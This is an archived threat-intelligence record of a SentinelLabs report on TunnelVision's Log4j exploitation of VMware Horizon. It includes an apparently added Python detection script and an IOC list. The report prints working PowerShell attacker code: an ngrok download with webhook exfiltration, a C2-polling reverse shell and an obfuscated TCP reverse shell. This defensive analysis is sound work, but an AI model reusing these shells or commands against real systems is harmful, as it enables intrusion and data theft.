{
	"id": "846b7701-62ec-4f06-b1dc-13ede4b9d923",
	"created_at": "2026-04-06T00:15:16.657954Z",
	"updated_at": "2026-04-10T03:34:00.362193Z",
	"deleted_at": null,
	"sha1_hash": "b29d11811c347eb1f16ba0bfaa4043ef63c6aedb",
	"title": "Log4j2 In The Wild | Iranian-Aligned Threat Actor \"TunnelVision\" Actively Exploiting VMware Horizon",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 66397,
	"plain_text": "Log4j2 In The Wild | Iranian-Aligned Threat Actor \"TunnelVision\" Actively Exploiting VMware Horizon\r\nBy Amitai Ben Shushan Ehrlich and Yair Rigevsky\r\nPublished: 2022-02-17 · Archived: 2026-04-05 13:19:09 UTC\r\nExecutive Summary\r\nSentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle East and the US.\r\nDue to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.\r\nMuch like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to the deployment of ransomware, making the group a potentially destructive actor.\r\nOverview\r\nTunnelVision activities are characterized by wide exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and, recently, Log4Shell. In almost all of those cases, the threat actor deployed a tunneling tool wrapped in a unique fashion. 
The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.\r\nTunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in the Attribution section.\r\nIn this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing on the exploitation of the VMware Horizon Log4j vulnerabilities.\r\nVMware Horizon Exploitation\r\nThe exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_TomcatService.exe).\r\nTunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.\r\nTypically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PowerShell reverse shells, executed via the Tomcat process.\r\nhttps://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nPage 1 of 5\r\nPowerShell Commands\r\nTunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands, sending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server (the destination path and the webhook URLs are cut off in the sample as shown):\r\ntry{\r\n (New-Object System.Net.WebClient).DownloadFile(\"hxxp://transfer.sh/uSeOFn/ngrok.exe\",\"C:\\\\Users\\P\r\n Rename-Item 'c://Users//public//new.txt' 'microsoft.exe';\r\n $a=iex 'dir \"c://Users//public//\"' | Out-String;\r\n iwr -method post -body $a https:\r\n}catch{\r\n iwr -method post -body $Error[0] https:\r\n}\r\nThroughout the activity the usage of multiple legitimate services was observed. 
Given an environment is compromised by TunnelVision, it might be helpful to look for outbound connections to any of those legitimate public services:\r\ntransfer.sh\r\npastebin.com\r\nwebhook.site\r\nufile.io\r\nraw.githubusercontent.com\r\nReverse Shell #1\r\n$c = \"\"\r\n$p = \"\"\r\n$r = \"\"\r\n$u = \"hxxps://www.microsoft-updateserver.cf/gadfTs55sghsSSS\"\r\n$wc = New-Object System.Net.WebClient\r\n$li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0];\r\n$c = \"whoami\"\r\n$c = 'Write-Host \" \";'+$c\r\n$r = &(gcm *ke-e*) $c | Out-String > \"c:\\programdata\\$env:COMPUTERNAME-$li\"\r\n$ur = $wc.UploadFile(\"$u/phppost.php\" , \"c:\\programdata\\$env:COMPUTERNAME-$li\")\r\nwhile($true)\r\n{\r\n $c = $wc.DownloadString(\"$u/$env:COMPUTERNAME-$li/123.txt\")\r\n $c = 'Write-Host \" \";'+$c\r\n if($c -ne $p)\r\n {\r\n $r = &(gcm *ke-e*) $c | Out-String > \"c:\\programdata\\$env:COMPUTERNAME-$li\"\r\n $p = $c\r\n $ur = $wc.UploadFile(\"$u/phppost.php\" , \"c:\\programdata\\$env:COMPUTERNAME-$li\")\r\n }\r\n sleep 3\r\n}\r\nThe shell polls the C2 for a command file every three seconds, writes command output to c:\\programdata\\<COMPUTERNAME>-<first IPv4 address> and uploads that file to phppost.php on the same server. Invoke-Expression is resolved indirectly through a wildcard Get-Command lookup (gcm *ke-e*), so the cmdlet name never appears literally in the script.\r\nReverse Shell #1 was used in the past by TunnelVision operators (7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: “hxxp://google.onedriver-srv.ml/gadfTs55sghsSSS”. This C2 was referenced in several articles analyzing TunnelVision activities.\r\nThroughout the activity the threat actor leveraged another domain, service-management[.]tk, used to host malicious payloads. 
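The Tomcat parent process, the list of public services above and the Reverse Shell #1 artifacts (the c:\\programdata\\<COMPUTERNAME>-<IP> output file and the phppost.php upload to the C2) translate directly into host-based detection logic. The following Python is an added example written for this page, not code from SentinelLabs or from the threat actor. It runs offline over a handful of constructed Sysmon-style events (the hostnames, IPs and process IDs in the sample are made up) and scores each one. The set of shells that should never be children of ws_TomcatService.exe is an assumption, and connections to the legitimate file-sharing services are rated low on their own and raised to high only when the connecting process is itself a Tomcat-spawned shell, which is how the report describes the activity.

```python
import ntpath
import re
from typing import Dict, List

# Indicators taken from the report text above (defanging brackets removed so they match telemetry).
C2_DOMAINS = {'www.microsoft-updateserver.cf', 'google.onedriver-srv.ml'}
PAYLOAD_DOMAINS = {'service-management.tk'}
# Legitimate public services the report says TunnelVision abused for payload hosting and output exfil.
ABUSED_SERVICES = {'transfer.sh', 'pastebin.com', 'webhook.site', 'ufile.io', 'raw.githubusercontent.com'}
# Assumption (not from the report): shells a Horizon Tomcat service has no business spawning.
SHELLS = {'powershell.exe', 'pwsh.exe', 'cmd.exe'}
TOMCAT = 'ws_tomcatservice.exe'
# Reverse Shell #1 writes its output to c:\programdata\<COMPUTERNAME>-<first IPv4 address>.
# Written with character classes so the pattern needs no backslash escapes.
RS1_OUTPUT = re.compile(r'^.+-[0-9]{1,3}([.][0-9]{1,3}){3}$', re.IGNORECASE)

def base_name(path: str) -> str:
    # ntpath handles Windows separators, including repeated ones, on any platform.
    return ntpath.basename(path).lower()

def host_matches(host: str, names) -> bool:
    # Exact match or subdomain match against a set of domain names.
    host = host.lower().rstrip('.')
    return any(host == n or host.endswith('.' + n) for n in names)

def score_events(events: List[Dict]) -> List[Dict]:
    # Returns one finding per suspicious event: {'pid', 'severity', 'reason'}.
    findings = []
    shell_pids = set()  # PIDs of shells spawned by the Horizon Tomcat service, for correlation
    for ev in events:
        kind = ev['kind']
        if kind == 'process':
            parent = base_name(ev['parent_image'])
            child = base_name(ev['image'])
            if parent == TOMCAT and child in SHELLS:
                shell_pids.add(ev['pid'])
                findings.append({'pid': ev['pid'], 'severity': 'high',
                                 'reason': 'shell spawned by ws_TomcatService.exe (Log4Shell post-exploitation pattern)'})
            elif parent == TOMCAT:
                findings.append({'pid': ev['pid'], 'severity': 'medium',
                                 'reason': 'unexpected child of ws_TomcatService.exe: ' + child})
        elif kind == 'network':
            host = ev['dest_host']
            if host_matches(host, C2_DOMAINS | PAYLOAD_DOMAINS):
                findings.append({'pid': ev['pid'], 'severity': 'high',
                                 'reason': 'connection to TunnelVision C2/payload domain ' + host})
            elif host_matches(host, ABUSED_SERVICES):
                sev = 'high' if ev['pid'] in shell_pids else 'low'
                findings.append({'pid': ev['pid'], 'severity': sev,
                                 'reason': 'connection to abused public service ' + host})
        elif kind == 'file':
            target = ev['target']
            if base_name(ntpath.dirname(target)) == 'programdata' and RS1_OUTPUT.match(base_name(target)):
                findings.append({'pid': ev['pid'], 'severity': 'high',
                                 'reason': 'Reverse Shell #1 output file pattern: ' + target})
    return findings

# Constructed sample telemetry (not from the report): one Horizon server after exploitation,
# plus a benign browser download from the same public service for contrast.
SAMPLE_EVENTS = [
    {'kind': 'process', 'pid': 4120,
     'parent_image': r'C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_TomcatService.exe',
     'image': r'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'},
    {'kind': 'network', 'pid': 4120, 'dest_host': 'transfer.sh', 'dest_port': 443},
    {'kind': 'network', 'pid': 4120, 'dest_host': 'www.microsoft-updateserver.cf', 'dest_port': 443},
    {'kind': 'file', 'pid': 4120, 'target': r'c:\\programdata\\HORIZON-CS01-10.20.30.40'},
    {'kind': 'process', 'pid': 5200, 'parent_image': r'C:\\Windows\\explorer.exe',
     'image': r'C:\\Program Files\\Mozilla Firefox\\firefox.exe'},
    {'kind': 'network', 'pid': 5200, 'dest_host': 'raw.githubusercontent.com', 'dest_port': 443},
]

if __name__ == '__main__':
    for f in score_events(SAMPLE_EVENTS):
        print(f['severity'].upper(), f['pid'], f['reason'])
```

Run against the sample, the Tomcat-spawned PowerShell, its transfer.sh download, its beacon to the C2 domain and its output file each produce a high-severity finding, while the browser fetch from raw.githubusercontent.com stays low. In production the same rules would be fed from Sysmon event IDs 1 (process creation), 3 (network connection) and 11 (file create), and the parent-child check is the one worth alerting on by itself.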
According to VirusTotal, service-management[.]tk was also used to host a zip file (d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor (624278ed3019a42131a3a3f6e0e2aac8d8c8b438).\r\nThe backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to %ProgramData%\\Installed Packages\\InteropServices.exe and registers it as a service named “InteropServices”.\r\nThe dropped executable contains an obfuscated version of the reverse shell described above, beaconing to the same C2 server (www[.]microsoft-updateserver[.]cf). Although it is not encrypted, it is deobfuscated and executed in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its PowerShell payload.\r\nReverse Shell #2\r\n$hst = \"51.89.135.142\";\r\n$prt = 443;\r\nfunction watcher() {\r\n $limit = (Get-Random -Minimum 3 -Maximum 7);\r\n $stopWatch = New-Object -TypeName System.Diagnostics.Stopwatch;\r\n $timeSpan = New-TimeSpan -Seconds $limit;\r\n $stopWatch.Start();\r\n while ((($stopWatch.Elapsed).TotalSeconds -lt $timeSpan.TotalSeconds)) {};\r\n $stopWatch.Stop();\r\n};\r\nwatcher;\r\n$arr = New-Object int[] 500;\r\nfor ($i = 0; $i -lt 99; $i++) {\r\n $arr[$i] = (Get-Random -Minimum 1 -Maximum 25);\r\n};\r\nif ($arr[0] -gt 0) {\r\n $valksdhfg = New-Object System.Net.Sockets.TCPClient($hst, $prt);\r\n $banljsdfn = $valksdhfg.GetStream();\r\n [byte[]]$bytes = 0..65535|% { 0 };\r\n while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length)) -ne 0) {\r\n $lkjnsdffaa = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);\r\n $nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2>&1 | Out-String);\r\n $nsdfgsahjxx2 = $nsdfgsahjxx + (pwd).Path + \"> \";\r\n $sendbyte = 
([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2);\r\n $banljsdfn.Write($sendbyte, 0, $sendbyte.Length);\r\n $banljsdfn.Flush();\r\n watcher\r\n };\r\n $valksdhfg.Close();\r\n};\r\nThe random 3 to 7 second busy-wait in watcher and the loop that fills an unused array are padding meant to disturb sandbox timing and simple signatures; the actual shell is the TCPClient loop, which reads a command, runs it through a wildcard-resolved Invoke-Expression and writes the output and current directory back over the socket.\r\nMost of the “online” activities we observed were performed from this PowerShell backdoor. It seems to be a modified variant of a publicly available PowerShell one-liner.\r\nAmong those activities were:\r\nExecution of recon commands.\r\nCreation of a backdoor user and adding it to the administrators group.\r\nCredential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.\r\nDownload and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.\r\nExecution of a reverse shell utilizing the VMware Horizon NodeJS component[1,2].\r\nInternal subnet RDP scan using a publicly available port scan script.\r\nThroughout the activity, the threat actor utilized a GitHub repository, “VmWareHorizon”, of an account owned by the threat actor, using the name “protections20”.\r\nAttribution\r\nTunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names, such as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).\r\nThis confusion arises since activity that Microsoft recognizes as a single group, “Phosphorus”, overlaps with activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.\r\nWe track this cluster separately under the name “TunnelVision”. 
This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\r\nIndicators of Compromise\r\nTYPE | INDICATOR | NOTES\r\nDomain | www[.]microsoft-updateserver[.]cf | Command and Control (C2) Server\r\nDomain | www[.]service-management[.]tk | Payload server\r\nIP | 51.89.169[.]198 | Command and Control (C2) Server\r\nIP | 142.44.251[.]77 | Command and Control (C2) Server\r\nIP | 51.89.135[.]142 | Command and Control (C2) Server\r\nIP | 51.89.190[.]128 | Command and Control (C2) Server\r\nIP | 51.89.178[.]210 | Command and Control (C2) Server, Tunneling Server\r\nIP | 142.44.135[.]86 | Tunneling Server\r\nIP | 182.54.217[.]2 | Payload Server\r\nGitHub Account | https://github.com/protections20 | Account utilized to host payloads\r\nSource: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/"
	],
	"report_names": [
		"log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48",
			"created_at": "2022-10-25T16:07:23.84296Z",
			"updated_at": "2026-04-10T02:00:04.762229Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"DEV-0270",
				"DireFate",
				"Lord Nemesis",
				"Nemesis Kitten",
				"Yellow Dev 23",
				"Yellow Dev 24"
			],
			"source_name": "ETDA:DEV-0270",
			"tools": [
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"WmiExec"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0",
			"created_at": "2023-03-04T02:01:54.110909Z",
			"updated_at": "2026-04-10T02:00:03.359871Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"Nemesis Kitten",
				"Storm-0270"
			],
			"source_name": "MISPGALAXY:DEV-0270",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b29d11811c347eb1f16ba0bfaa4043ef63c6aedb.pdf",
		"text": "https://archive.orkl.eu/b29d11811c347eb1f16ba0bfaa4043ef63c6aedb.txt",
		"img": "https://archive.orkl.eu/b29d11811c347eb1f16ba0bfaa4043ef63c6aedb.jpg"
	}
}